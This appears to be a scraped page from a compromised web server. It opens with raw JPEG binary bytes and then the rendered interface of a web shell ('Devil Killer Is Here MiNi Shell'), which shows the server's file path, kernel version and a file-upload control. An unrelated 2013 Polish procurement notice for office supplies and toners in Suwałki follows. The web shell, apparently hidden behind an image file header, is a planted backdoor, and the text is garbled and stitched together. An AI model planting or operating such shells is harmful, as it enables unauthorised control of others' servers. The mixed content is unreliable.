JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130315/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130315/104166-N-2013.html

<p class="kh_header"><b>Suwałki: Dostawy materiałów biurowych papieru ksero oraz tonerów na potrzeby realizacji projektu pt.: mobilny Klub Integracji Społecznej II WND-POKL.07.02.01-20-32012</b><br>
<b>Numer ogłoszenia: 104166 - 2013; data zamieszczenia: 15.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Rozwoju Regionalnego ARES S.A. w Suwałkach , ul. Teofila Noniewicza 42A, 16-400 Suwałki, woj. podlaskie, tel. 87 5666106, faks 87 5667497.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ares.suwalki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy materiałów biurowych papieru ksero oraz tonerów na potrzeby realizacji projektu pt.: mobilny Klub Integracji Społecznej II WND-POKL.07.02.01-20-32012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawy materiałów biurowych papieru ksero oraz tonerów na potrzeby realizacji projektu pt.: mobilny Klub Integracji Społecznej II WND-POKL.07.02.01-20-320-12. ZADANIE 1: Sukcesywna dostawa materiałów biurowych, papieru ksero oraz tonerów na potrzeby realizacji projektu mobilny Klub Integracji Społecznej II. ZADANIE 2: Dostawa jednorazowa 16 kompletów materiałów szkoleniowych na potrzeby uczestników i uczestniczek kursów zawodowych Spawacz metodą TIG, Spawacz metodą MAG, w ramach projektu mobilny Klub Integracji Społecznej II.ZADANIE 3: Dostawa jednorazowa  materiałów biurowych, papieru ksero oraz tonerów na potrzeby Poradnictwa zawodowego w projekcie mobilny Klub Integracji Społecznej II..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.21.13-6, 30.12.51.10-5, 30.19.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Opis sposobu dokonywania oceny spełnienia warunku: weryfikacja nastąpi na podstawie złożonego wraz z ofertą oświadczenia Wykonawcy wg załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Opis sposobu dokonywania oceny spełnienia warunku: weryfikacja nastąpi na podstawie złożonego wraz z ofertą oświadczenia Wykonawcy wg załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Opis sposobu dokonywania oceny spełnienia warunku: weryfikacja nastąpi na podstawie złożonego wraz z ofertą oświadczenia Wykonawcy wg załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Opis sposobu dokonywania oceny spełnienia warunku: weryfikacja nastąpi na podstawie złożonego wraz z ofertą oświadczenia Wykonawcy wg załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Opis sposobu dokonywania oceny spełnienia warunku: weryfikacja nastąpi na podstawie złożonego wraz z ofertą oświadczenia Wykonawcy wg załącznika nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:oryginał lub poświadczoną przez Wykonawcę za zgodność z oryginałem kopia aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazanie braku podstaw do wykluczenia w oparciu o art. 24 ust.1 pkt.2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:Oświadczenie Wykonawcy o braku przynależności do grupy kapitałowej (podstawa art. 24 ust. 2 pkt. 5 ustawy)  - wzór oświadczenia stanowi załącznik nr 5 do SIWZ, oraz w przypadku gdy Wykonawca należy do grupy kapitałowej - wykaz podmiotów wchodzących w skład grupy kapitałowej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Stosownie do art. 144 ustawy, Zamawiający zastrzega sobie możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której wybrano Wykonawcę, polegającej na:zmianie osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej umowy,sprostowania oczywistych omyłek pisarskich i rachunkowych. Ponadto  Zamawiający przewiduje możliwość zmiany umowy w przypadku:gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizacje przedmiotu umowy, gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na sfinansowanie umowy, zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy. Zmiana postanowień zawartej umowy może nastąpić wyłącznie w przypadkach przewidzianych ustawą oraz postanowieniami niniejszej Specyfikacji istotnych warunków zamówienia, za zgodą obu Stron wyrażoną na piśmie w formie aneksu do umowy, pod rygorem nieważności takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ares.suwalki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Rozwoju Regionalnego ARES S.A. w Suwałkach 16-400 Suwałki, ul. Noniewicza 42A. Godziny urzędowania:7.00-15.00 od poniedziałku do piątku..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2013 godzina 08:00, miejsce: Agencja Rozwoju Regionalnego ARES S.A. w Suwałkach 16-400 Suwałki, ul. Noniewicza 42A, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> mobilny Klub Integracji Społecznej II WND - POKL.07.02.01-20-320/12 Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, wdrożony i realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Działanie 7.2 Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej Poddziałanie 7.2.1 Aktywizacja zawodowa i społeczna osób zagrożonych wykluczeniem społecznym..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sukcesywna dostawa materiałów biurowych, papieru ksero oraz tonerów na potrzeby realizacji projektu mobilny Klub Integracji Społecznej II..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sukcesywna dostawa materiałów biurowych, papieru ksero oraz tonerów na potrzeby realizacji projektu mobilny Klub Integracji Społecznej.
1.Papier ksero A4 80g-m2 (ryza 500 ark.), Klasa B, Stopień bieli CIE 161+2-60	ryz.
2.Papier ksero kolorowy A4 80g mix kolorów,ryza 100 k.1ryza.3.Skoroszyt PCV z oczkami, zawieszany do segregatora A4, przednia okładka przezroczysta, tylna kolorowa, kolory: zielony, niebieski, fioletowy, żółty. Z wąsem metalowym. Posiadająca papierowy dwustronnie zapisywany pasek brzegowy z możliwością pisania po nim długopisem 200 szt.4. Segregator A4-7,5 cm dwu-ringowy mechanizm dźwigowy, okucie metalowe na dolnych krawędziach, dwustronna wymienna etykieta na grzbiecie, na przedniej okładce dwa otwory rado ułatwiające zamykanie segregatora, wzmocniony otwór na palec ułatwiający wyjmowanie segregatora, oklejony z zewnątrz folią polipropylenową	25	szt.
5.Segregator A4-5 cm dwu-ringowy mechanizm dźwigowy, okucie metalowe na dolnych krawędziach, dwustronna wymienna etykieta na grzbiecie, na przedniej okładce dwa otwory rado ułatwiające zamykanie segregatora, wzmocniony otwór na palec ułatwiający wyjmowanie segregatora, oklejony z zewnątrz folią polipropylenową 15 szt.6. Koszulka krystaliczna na dokumenty A4 folia, otwierana z góry, przeźroczysta (op. 100 szt.) 20	op.7.Teczka kartonowa gładka z gumką A4 w kolorze: czerwona, żółta, zielona 30 szt.8.Długopis plastikowy z mechanizmem włącz-wyłącz z gumową antypoślizgową skuwką, wkład niebieski, grubość linii 0,7 mm 50 szt.9. Długopis plastikowy z mechanizmem włącz-wyłącz z gumową antypoślizgową skuwką, wkład czarny, grubość linii 0,7 mm	10 szt.10.Cienkopis, grubość linii 0,4 mm, kolory: czerwony (10 szt.), czarny (10 szt.), niebieski (10 szt.), zielony (10 szt.), fioletowy (10 szt.) 50	szt.
11. Zakreślacz gruby do wszystkich rodzajów papieru, z bezzapachowym nietoksycznym atramentem, niezmieniającym koloru oryginalnego pisma, końcówka ścięta, umożliwiająca zakreślanie w dwóch grubościach 2 i 5 mm, zamkniecie z klipsem, Kolor: zielony 5 szt., różowy 5 szt., pomarańczowy 5 szt., żółty 5 szt.20 szt.12.Pisaki do tablicy Flipchart: 5 szt. W komplecie kolor: zielony, niebieski, czerwony, czarny Nietoksyczne, długość linii pisania 320 m 5op.13.Marker do płyt CD/DVD, tusz nietoksyczny, w kolorze czarnym 4 szt.14.Ołówek z gumką HB 6 szt.15.Temperówka metalowa pojedyncze ostrze 2 szt.16.Linijka plastikowa 20 cm 2	szt.17. Gumka do ścierania uniwersalna 4	szt.18.Papier Flipchart, gramatura 80 g, biały z perforacja do zawieszenia 64 x 95,5 cm 20 k 3 szt.19. Taśma biurowa przezroczysta 18m x 20 mm	8 szt.
20. Kostka biurowa nieklejona 90 x 90 mm, mix kolorów, 700 k 8 szt.
21. Bloczek samoprzylepny 76 x 76 mm, 400 k., mix kolorów	8 szt.
22.Zakładki indeksujące 20 x 50 mm, umożliwiają oznaczenie zawartości segregatorów kolorami (opakowanie zawiera 40 zakładek w 4 jaskrawych kolorach) 12 szt.23. Przybornik na biurko z tworzywa sztucznego, komora na ołówki i długopisy, drobne akcesoria tj. spinacze, zszywki oraz komora na karteczki 2 szt.24. Rozszywacz w obudowie z tworzywa sztucznego, części mechaniczne metalowe, dostosowany do zszywek 10, 24-6, 24-8, 26-6, 26-8 2 szt.25. Mini zszywacz w obudowie z tworzywa sztucznego, części mechaniczne metalowe, Zszywa 10 k 2 szt.26.Metalowy zszywacz biurowy z wykończeniem z tworzywa sztucznego, dostosowany do zszywek 24/6, zszywa 25 k 2	szt.
27	Zszywacz biurowy na 200 k, na zszywki 23-6, 23-8, 23-10, 23-13, 23-15, 23-17, 23-20, 23-23. 1 szt.28.Zszywki biurowe wysokiej jakości 24-6 opakowanie 1000 szt.	5 opak.29.Zszywki biurowe wysokiej jakości 10 opakowanie 1000 szt. 5 opak.30.Zszywki biurowe wysokiej jakości 23-17 opakowanie 1000 szt.	5 opak.31.Zszywki biurowe wysokiej jakości 23/10 opakowanie 1000 szt. 5 opak.33.Nożyczki biurowe 15,5 cm 1 szt.33.Nożyczki biurowe 17-1	szt.34.klej w sztyfcie do klejenia papieru, tektury, nietoksyczny, 15 g. 4	szt.35. Korektor w piórze z metalową końcówką 10 ml, szybkoschnący, z możliwością pisania długopisem po zakorektorowanym miejscu	4 szt.36.Metalowy dziurkacz biurowy z wykończeniem z tworzywa sztucznego, z wysuwanym ogranicznikiem, dziurkuje 30 k.	1 szt.37. Dziurkacz biurowy z metalową obudową z ogranicznikiem formatu, dziurkuje 60 k.1 szt.38.Płyta CD-R 700 MB, opakowanie 100 szt. 1	op.39.Przekładki kartonowe indeksujące do segregatora, mix kolorów,  opakowania 100 szt. 2	op.40.Spinacze biurowe stalowe 33 mm, opakowanie 100 szt. 10	op.41. Spinacze biurowe stalowe 50 mm, opakowanie 100 szt. 10 op.42. Klip do papieru 19 mm metalowy, opakowanie. 12 szt. 10	op.43.Klip do papieru 32 mm metalowy, opakowanie. 12 szt. 5 op.44.Klip do papieru 50 mm metalowy, opakowanie. 12 szt. 5	op.45. Dziennik zajęć I-6-ID	10	szt.46. Blok biurowy A5 w kratkę, 50 k., klejony po krótkim boku 20 szt.47. Blok biurowy A4 w kratkę, 100 k, klejony po krótkim boku 20 szt.
48.Tablica korkowa w ramie drewnianej 60 cm x 90 cm	3 szt. 49.Toner do faxu Panasonic KX-MB 2025 Okres gwarancji: co najmniej 24 miesiące od dnia odbioru toneru przez Zamawiającego,Toner  równoważny opisanemu musi być kompatybilny z w/w  faxem i spełniać wymagania dotyczące przedmiotu zamówienia 3 szt.50. Toner do drukarki HP Laser Jet M2727 nf, Okres gwarancji: co najmniej 24 miesiące od dnia odbioru toneru przez Zamawiającego,Toner  równoważny opisanemu musi być kompatybilny z w/w  drukarką i spełniać wymagania dotyczące przedmiotu zamówienia 	3 szt.51. Toner Konika Minolta Bizhub 283 (TN217)Okres gwarancji: co najmniej 24 miesiące od dnia odbioru toneru przez Zamawiającego,Toner  równoważny opisanemu musi być kompatybilny z w/w  drukarką i spełniać wymagania dotyczące przedmiotu zamówienia 2 szt.52.Toner do drukarki HP Laser Jet P1102, Okres gwarancji: co najmniej 24 miesiące od dnia odbioru toneru przez Zamawiającego,Toner  równoważny opisanemu musi być kompatybilny z w/w  drukarką i spełniać wymagania dotyczące przedmiotu zamówienia 2 szt.Szacunkowa liczba dostaw: 6.Wymagania dotyczące przedmiotu zamówienia : 
1.Zamawiający wymaga dostawy materiałów eksploatacyjnych fabrycznie nowych, oryginalnych wyprodukowanych przez producenta sprzętu lub materiałów eksploatacyjnych równoważnych.
2.Przez materiał eksploatacyjny równoważny Zamawiający rozumie produkt:
a.fabrycznie nowy, nie regenerowany, pochodzący z bieżącej produkcji, wytworzony seryjnie w cyklu produkcyjnym, zgodnym z normą ISO 9001 lub normami równoważnymi, nie powodujący utraty gwarancji,
b.opakowany hermetycznie, nie noszący śladów użytkowania,
c.którego wydajność, zgodnie z normą ISO-IEC 19752 dla kaset z tonerem do drukarek monochromatycznych, ISO/IEC 19798 dla kaset z tonerem do kolorowych drukarek laserowych, 
oraz ISO-IEC 24711 dla wkładów drukujących, jest co najmniej taka jak materiału oryginalnego zalecanego przez producentów sprzętu,
d.który zapewnia jakość wydruku co najmniej taką, jak materiał oryginalny, zalecany przez producenta sprzętu,
e.który nie ogranicza pełnej współpracy z programem sprzętu, monitorującym stan zasobników 
z tuszem lub tonerem,
f.który w żadnym stopniu nie narusza praw patentowych ani innej własności intelektualnej, 
g.w którym wszystkie części są nowe, w szczególności bęben światłoczuły, listwa podająca, listwa zbierająca, wałek magnetyczny, 
h.w którym zastosowano toner -tusz dopasowany do pracy z danym urządzeniem. 
3.Wszystkie oferowane materiały winny być opatrzone znakiem firmowym producenta, etykietą zawierającą numer katalogowy, kod kreskowy, listę modeli sprzętu, do których jest przeznaczony oraz termin ważności. 
4.Zamawiający nie dopuszcza możliwości zaoferowania materiałów eksploatacyjnych napełnianych powtórnie lub skopiowanych w sposób naruszający prawo polskie lub UE.
5.Wszystkie materiały eksploatacyjne muszą posiadać: 
a.dla poszczególnych tonerów dokumenty -testy wydajnościowe, z których w sposób nie budzący wątpliwości winno wynikać, że oferowany materiał posiada takie same lub lepsze parametry techniczne, wydajnościowe i jakościowe zgodnie z normami:  ISO-IEC 19752 - dla tonerów monochromatycznych ISO-IEC 24711 - dla wkładów atramentowych , ISO-IEC 19798 - dla tonerów kolorowych
b. certyfikaty - dokumenty potwierdzające, że proces produkcji zaproponowanego asortymentu przebiega zgodnie z normami ISO 90001: 2000. Powyższe dokumenty Wykonawca będzie zobowiązany dostarczyć wraz z dostawą materiałów do siedziby Zamawiającego.  
6.Jeżeli w trakcie trwania umowy Zamawiający stwierdzi, iż wydajność, jakość lub niezawodność dostarczonych produktów odbiega na niekorzyść od parametrów produktu oryginalnego (pochodzącego od producenta urządzenia, do którego materiał jest przeznaczony) lub jeżeli produkt  nie sygnalizuje we właściwy sposób stanu zużycia tuszu lub tonera, może zażądać od Wykonawcy zamiany materiału oferowanego na materiał nowy.
7. W przypadku trzeciej reklamacji danego typu materiału eksploatacyjnego Zamawiający może żądać dostaw materiałów oryginalnych.
Oferta równoważna:Wszystkie wskazane  materiały należy rozumieć jako określenie wymaganych parametrów technicznych 
lub standardów jakościowych. Zamawiający dopuszcza dostawę materiałów eksploatacyjnych równoważnych 
do drukarek co do jakości i zastosowanych rozwiązań technicznych i technologicznych opisywanych w niniejszej specyfikacji.                     
Jeżeli Wykonawca składający ofertę zaoferuje rozwiązania równoważne, to na Wykonawcy spoczywa obowiązek (ciężar dowodu) wykazania równoważności poprzez złożenie w ofercie odpowiednich dokumentów potwierdzających tą równoważność..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.21.13-6, 30.12.51.10-5, 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
